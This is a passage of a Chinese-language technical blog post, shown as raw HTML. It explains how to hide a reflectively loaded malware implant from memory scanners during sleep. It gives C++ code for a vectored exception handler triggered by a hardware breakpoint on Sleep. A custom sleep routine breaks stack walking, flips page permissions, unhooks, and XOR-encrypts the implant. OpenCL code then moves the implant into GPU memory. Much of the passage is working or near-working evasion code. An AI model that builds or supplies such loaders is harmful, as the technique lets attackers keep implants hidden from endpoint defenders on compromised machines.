src="https://wechat2rss.xlab.app/img-proxy/?k=5233f1d0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFzFWUgnEelwJraRxsddmEqEpBLK8suyL6zzPw6wu0uLOtp3wG6JwnSw%2F640%3Fwx_fmt%3Djpeg"/></span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><strong><span style=""><span style="mso-bookmark:实现;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">参考方案2：</span></span></span></strong></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-imgfileid="100000520" data-ratio="0.5472222222222223" style="width: 560.01001px;height: auto !important;" data-type="jpeg" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=003325a1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFvgdG68goicTTQAGUFevBgxEAE1xr0pcf6UiczFF0Q9E9B1uMdI7riaZgw%2F640%3Fwx_fmt%3Djpeg"/></span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">              <o:p> </o:p></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><strong><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:自定义veh回调;"><span style="font-family:宋体;mso-ascii-font-family:Calibri;font-variant:normal;text-transform:none;">自定义VEH回调</span></span></span></span></strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:自定义veh回调;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">下面的伪代码对应触发硬件断点后需要进入的自定义VEH函数以及VEH返回时需要重定向进入的mySleep()。</span></span></span></span></p><p style="margin-top: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;word-break: break-all;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:自定义veh回调;"><span style="">// 定义全局对象</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:自定义veh回调;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">           <br/>

                <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:自定义veh回调;"><span style="">// 自定义VEH回调函数，由硬件断点触发（自动修改页权限，自动栈回溯追踪反射dll加载的内存页）</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:自定义veh回调;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/></span></span></span></span></p><section><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cpp"><code><span class="code-snippet_outer"><span class="code-snippet__function">LONG CALLBACK <span class="code-snippet__title">myVEHHandler_4</span><span class="code-snippet__params">(EXCEPTION_POINTERS* pExceptionInfo)</span> </span>{                </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">if</span> (pExceptionInfo-&gt;ExceptionRecord-&gt;ExceptionCode == EXCEPTION_SINGLE_STEP &amp;&amp; (DWORD_PTR)pExceptionInfo-&gt;ContextRecord-&gt;Rip == hwbp.mySleepAddr) {                </span></code><code><span class="code-snippet_outer">        MEMORY_BASIC_INFORMATION mbi;                </span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">if</span> (((SIZE_T(WINAPI*)(LPCVOID, PMEMORY_BASIC_INFORMATION, SIZE_T))hwbp.myVirtualQueryAddr)(*<span class="code-snippet__keyword">reinterpret_cast</span>(pExceptionInfo-&gt;ContextRecord-&gt;Rsp), &amp;mbi, <span class="code-snippet__keyword">sizeof</span>(mbi))) {                </span></code><code><span class="code-snippet_outer">            <span class="code-snippet__comment">// 在第一个执行周期中释放反射加载器的内存                </span></span></code><code><span class="code-snippet_outer">            <span class="code-snippet__keyword">if</span> (hwbp.shellcodeAddr != <span class="code-snippet__keyword">static_cast</span>(mbi.AllocationBase)) {                </span></code><code><span class="code-snippet_outer">                <span class="code-snippet__keyword">if</span> (!VirtualFree(hwbp.shellcodeAddr, <span class="code-snippet__number">0</span>, MEM_RELEASE)) {                </span></code><code><span class="code-snippet_outer">                    <span class="code-snippet__built_in">exit</span>(<span class="code-snippet__number">-1</span>);                </span></code><code><span class="code-snippet_outer">                }                </span></code><code><span class="code-snippet_outer">                <span class="code-snippet__comment">// 释放内存并将指针指向反射加载的植入体并更新内存页相关信息                </span></span></code><code><span class="code-snippet_outer">                <span class="code-snippet__comment">// 转储进VRAM然后清除临时buffer                </span></span></code><code><span class="code-snippet_outer">            }                </span></code><code><span class="code-snippet_outer">            <span class="code-snippet__keyword">else</span> {                </span></code><code><span class="code-snippet_outer">                <span class="code-snippet__comment">// 更新OpenCl的buffer，内存页相关信息保持不变                </span></span></code><code><span class="code-snippet_outer">            }                </span></code><code><span class="code-snippet_outer">        }                </span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">else</span> {                </span></code><code><span class="code-snippet_outer">            <span class="code-snippet__built_in">exit</span>(<span class="code-snippet__number">-1</span>);                </span></code><code><span class="code-snippet_outer">        }</span></code></pre></section></section><p style="margin-top: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;word-break: break-all;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:自定义veh回调;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"></span></span></span></span></p><p style="margin-top: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;word-break: break-all;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:自定义veh回调;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">            <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:自定义veh回调;"><span style=""><span style="mso-spacerun:yes;">        </span>// 通过指针调用自己写的Sleep后手动返回（手动重设Rip和线程上下文）</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:自定义veh回调;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/></span></span></span></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="php"><code><span class="code-snippet_outer">hwbp.SleepTime = (DWORD)pExceptionInfo-&gt;ContextRecord-&gt;Rcx;                </span></code><code><span class="code-snippet_outer">        pExceptionInfo-&gt;ContextRecord-&gt;Rip = (DWORD64)hwbp.mySleep;                </span></code><code><span class="code-snippet_outer">        pExceptionInfo-&gt;ContextRecord-&gt;ContextFlags = CONTEXT_FULL;                </span></code><code><span class="code-snippet_outer">        HANDLE hHookThread = OpenThread(THREAD_ALL_ACCESS, <span class="code-snippet__keyword">FALSE</span>, GetCurrentThreadId());                </span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">if</span> (!hHookThread) {                </span></code><code><span class="code-snippet_outer">            <span class="code-snippet__keyword">exit</span>(<span class="code-snippet__number">-1</span>);                </span></code><code><span class="code-snippet_outer">        }                </span></code><code><span class="code-snippet_outer">        SetThreadContext(hHookThread, pExceptionInfo-&gt;ContextRecord);                </span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">return</span> EXCEPTION_CONTINUE_EXECUTION;                </span></code><code><span class="code-snippet_outer">    }                </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> EXCEPTION_CONTINUE_SEARCH;                </span></code><code><span class="code-snippet_outer">}</span></code></pre></section><p style="margin-top: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;word-break: break-all;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:自定义veh回调;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">

                <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:自定义veh回调;"><span style="">// 自己实现的Sleep</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:自定义veh回调;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/></span></span></span></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cpp"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">void</span> WINAPI HardwareBP::mySleep(DWORD dwMilliseconds)                </span></code><code><span class="code-snippet_outer">{                </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 将返回地址暂时改为0，切断栈回溯                </span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 设置RW                </span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 清空植入体内存页                </span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 临时解Hook                </span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 调用原始Sleep函数                </span></span></code><code><span class="code-snippet_outer">    Sleep(hwbp.SleepTime);                </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 重新Hook                </span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 取回植入体                </span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 清理堆                </span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 解XOR                </span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 设置RWX                </span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 恢复返回地址                </span></span></code><code><span class="code-snippet_outer">}</span></code></pre></section><p style="margin-top: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;word-break: break-all;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"> <o:page></o:page></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:自定义veh回调;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">接下来详细解释一下伪代码中的几个关键步骤分别做了什么工作。</span></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><strong><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:配置硬件断点;"><span style="font-family:宋体;mso-ascii-font-family:Calibri;font-variant:normal;text-transform:none;"><br/></span></span></span></span></strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="mso-bookmark:自定义veh回调;"></span><strong><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:配置硬件断点;"><span style="font-family:宋体;mso-ascii-font-family:Calibri;font-variant:normal;text-transform:none;">配置硬件断点</span></span></span></span></strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:配置硬件断点;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">首先讲一下硬件断点配置中最关键的寄存器</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:配置硬件断点;"><span style="">Dr7</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:配置硬件断点;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">。               <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:配置硬件断点;"><span style="">Dr7</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:配置硬件断点;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">用于控制和管理硬件断点，它包含多个位字段，用于控制和配置硬件断点的行为。以下是DR7寄存器的一些关键位字段及其功能。               <br/>L0, L1, L2, L3（0, 2, 4, 6位）：这些局部使能位用于控制每个硬件断点（DR0-DR3）是否启用。如果对应的位被设置为1，则相应的断点被启用。               <br/>G0, G1, G2, G3（1, 3, 5, 7位）：这些全局使能位也用于控制每个硬件断点（DR0-DR3）是否启用，但它们是从全局的角度进行控制。这意味着，即使在任务切换时，这些断点也仍然有效。               <br/>LE和GE位（8和9位）：这些位用于控制局部和全局断点是否对处理器的所有任务有效。通常，这些位在现代操作系统中不经常使用，因为操作系统会负责管理这些设置。               <br/>R/W0, R/W1, R/W2, R/W3（16-17, 20-21, 24-25, 28-29位）：这些字段用于设置每个硬件断点的触发条件。它们控制断点是在数据读取时、数据写入时，还是在指令执行时触发。值0表示断点被禁用，1表示断点在写入时触发，2表示在I/O读写时触发，3表示断点在数据读取或写入时触发。               <br/>Len0, Len1, Len2, Len3（18-19, 22-23, 26-27, 30-31位）：这些字段用于定义每个断点监视的内存区域的大小。可以设置为1（表示1字节）、2（表示2字节）、4（表示4字节）或8（64位模式下表示8字节）。               <br/>下面是一张英特尔提供的寄存器使用说明图。               <br/></span></span></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000527" data-ratio="1.0518518518518518" data-s="300,640" style="height: auto !important;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=10c31c84&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFzHc6UV44FHHDW84k53j1tlAft4Ux0qibHHDcicEFM8IPwYIaibBknEianA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:配置硬件断点;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">下面这段代码示例用来设置硬件断点，需要注意一点，硬件断点是线程相关的，也就是说在当前线程中设置的硬件断点在其他线程中不生效。</span></span></span></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cpp"><code><span class="code-snippet_outer"><span class="code-snippet__function"><span class="code-snippet__keyword">void</span> <span class="code-snippet__title">SetHardwareBreakpoint</span><span class="code-snippet__params">(HANDLE thread, <span class="code-snippet__keyword">void</span>* address)</span> </span>{                </span></code><code><span class="code-snippet_outer">    CONTEXT context = {<span class="code-snippet__number">0</span>};                </span></code><code><span class="code-snippet_outer">    context.ContextFlags = CONTEXT_DEBUG_REGISTERS;                </span></code><code><span class="code-snippet_outer">               </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 获取线程的当前上下文                </span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">if</span>(GetThreadContext(thread, &amp;context)) {                </span></code><code><span class="code-snippet_outer">        <span class="code-snippet__comment">// 设置DR0为我们的断点地址                </span></span></code><code><span class="code-snippet_outer">        context.Dr0 = <span class="code-snippet__keyword">reinterpret_cast</span>(address);                </span></code><code><span class="code-snippet_outer">        <span class="code-snippet__comment">// 设置断点条件，例如执行断点                </span></span></code><code><span class="code-snippet_outer">        context.Dr7 |= <span class="code-snippet__number">0x1</span>; <span class="code-snippet__comment">// 启用DR0断点                </span></span></code><code><span class="code-snippet_outer">               </span></code><code><span class="code-snippet_outer">        <span class="code-snippet__comment">// 应用修改后的上下文到线程                </span></span></code><code><span class="code-snippet_outer">        SetThreadContext(thread, &amp;context);                </span></code><code><span class="code-snippet_outer">    }                </span></code><code><span class="code-snippet_outer">}</span></code></pre></section><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:配置硬件断点;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">解除硬件断点也很简单，需要清空</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:配置硬件断点;"><span style="">Dr0</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:配置硬件断点;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">并清除</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:配置硬件断点;"><span style="">Dr7</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:配置硬件断点;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">中的标记位。</span></span></span></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cs"><code><span class="code-snippet_outer"><span class="code-snippet__function"><span class="code-snippet__keyword">void</span> <span class="code-snippet__title">ClearHardwareBreakpoint</span>(<span class="code-snippet__params">HANDLE thread</span>)</span> {                </span></code><code><span class="code-snippet_outer">    CONTEXT context = {<span class="code-snippet__number">0</span>};                </span></code><code><span class="code-snippet_outer">    context.ContextFlags = CONTEXT_DEBUG_REGISTERS;                </span></code><code><span class="code-snippet_outer">               </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 获取线程的当前上下文                </span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">if</span> (GetThreadContext(thread, &amp;context)) {                </span></code><code><span class="code-snippet_outer">        <span class="code-snippet__comment">// 清除DR0断点地址                </span></span></code><code><span class="code-snippet_outer">        context.Dr0 = <span class="code-snippet__number">0</span>;                </span></code><code><span class="code-snippet_outer">        <span class="code-snippet__comment">// 清除DR7的L0位以禁用DR0断点                </span></span></code><code><span class="code-snippet_outer">        context.Dr7 &amp;= ~<span class="code-snippet__number">0x1</span>;                </span></code><code><span class="code-snippet_outer">               </span></code><code><span class="code-snippet_outer">        <span class="code-snippet__comment">// 应用修改后的上下文到线程                </span></span></code><code><span class="code-snippet_outer">        SetThreadContext(thread, &amp;context);                </span></code><code><span class="code-snippet_outer">    }                </span></code><code><span class="code-snippet_outer">}</span></code></pre></section><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:宋体;mso-ascii-font-family:Calibri;font-variant:normal;text-transform:none;"><br/></span></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="mso-bookmark:配置硬件断点;"></span><strong><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:宋体;mso-ascii-font-family:Calibri;font-variant:normal;text-transform:none;">访问计算设备（GPU）</span></span></span></span></strong></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">和CUDA一样，OpenCL也有一套API来提供对GPU设备的访问。在这个场景中我们首先需要访问GPU的存储器，需要用到</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">clCreateBuffer()</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">方法。示例如下。</span></span></span></span></p><p style="margin-top: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;word-break: break-all;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">// 创建一个OpenCL内存对象（buffer）。</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">// 这个buffer是一个_cl_mem *对象，在GPU或其他设备上有对应的存储空间，可以进行读写操作（CL_MEM_READ_WRITE），并且在创建时，会从主机内存（即CPU内存）复制数据到设备上（CL_MEM_COPY_HOST_PTR）。</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">// dataSize参数指定了buffer的大小，(void*)shellcode是要复制到buffer的数据的指针，context是一个OpenCL上下文，代表了OpenCL运行环境，包括设备、内存对象等。</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/>

                <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">buffer = clCreateBuffer(context, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, dataSize, (void*)shellcode, NULL);</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"></span></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">重点说明一下</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">，其中</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">CL_MEM_READ_WRITE</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">是默认的，</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">CL_MEM_COPY_HOST_PTR</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">的含义是将内存中临时对象中保存的数据拷贝到VRAM中，并且CPU不能直接通过系统内存访问分配的数据，只能在将数据拷贝回来的时候才能访问。这也就确保了植入体在线程休眠期间驻留的绝对安全。               <br/></span></span></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000528" data-ratio="0.2814814814814815" data-s="300,640" style="height: auto !important;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a5129c1c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFkwFm8fS3zIWH8ucNBYV0SuIuSJZYzdLic17xZ22icibBP6mopKeu02eXQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">如果此时扫描进程内存，是可以在</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">buffer</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">的堆地址附近找到我们刚刚拷贝的植入体代码数据的（没有X权限)，而这个</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">_cl_mem *</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">的对象是一个不透明的数据结构，具体实现细节由OpenCL实现自身管理且对开发者是隐藏的。</span></span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">经过多次验证测试，这里临时保存的数据只有在</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">_cl_mem *</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">对象被彻底释放后才会消失，但Loader本身并不会主动对这段内存进行读写操作，因为它是由OpenCL Runtime管理的。如果想进一步降低这段内存被标记的可能性，可以做一个简单的XOR加密处理（XOR不会显著增加信息熵)。</span></span></span></span></p><p style="margin-top: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;word-break: break-all;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">// 这里使用的密钥是全局对象初始化时候随机生成的，写在了类的构造函数中</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/></span></span></span></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cpp"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">void</span> HardwarePB::scEncryptDecrypt(<span class="code-snippet__keyword">char</span>* data, <span class="code-snippet__keyword">size_t</span> size) {                </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">size_t</span> keyIndex = <span class="code-snippet__number">0</span>;                </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">size_t</span> keySize = <span class="code-snippet__built_in">strlen</span>(myKey);                </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">for</span> (<span class="code-snippet__keyword">size_t</span> i = <span class="code-snippet__number">0</span>; i &lt; size; ++i) {                </span></code><code><span class="code-snippet_outer">        data[i] ^= myKey[keyIndex];                </span></code><code><span class="code-snippet_outer">        keyIndex = (keyIndex + <span class="code-snippet__number">1</span>) % keySize;                </span></code><code><span class="code-snippet_outer">    }                </span></code><code><span class="code-snippet_outer">}</span></code></pre></section><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">下面就需要将数据写入VRAM中，由于调用OpenCL库的目的基本都是科学运算，为合理化我们的写入行为还需要再调用GPU对传入的数据做一些基础的计算工作。因此又做一个简单的XOR加密算法，但这个算法会在OpenCL运行时中动态编译并由GPU来执行。               <br/>下面代码用来定义一个由OpenCL内核动态编译的算法（实际使用OpenCL的大型项目中，这类代码都是以外置的文本文件形式存在）。</span></span></span></span></p><p 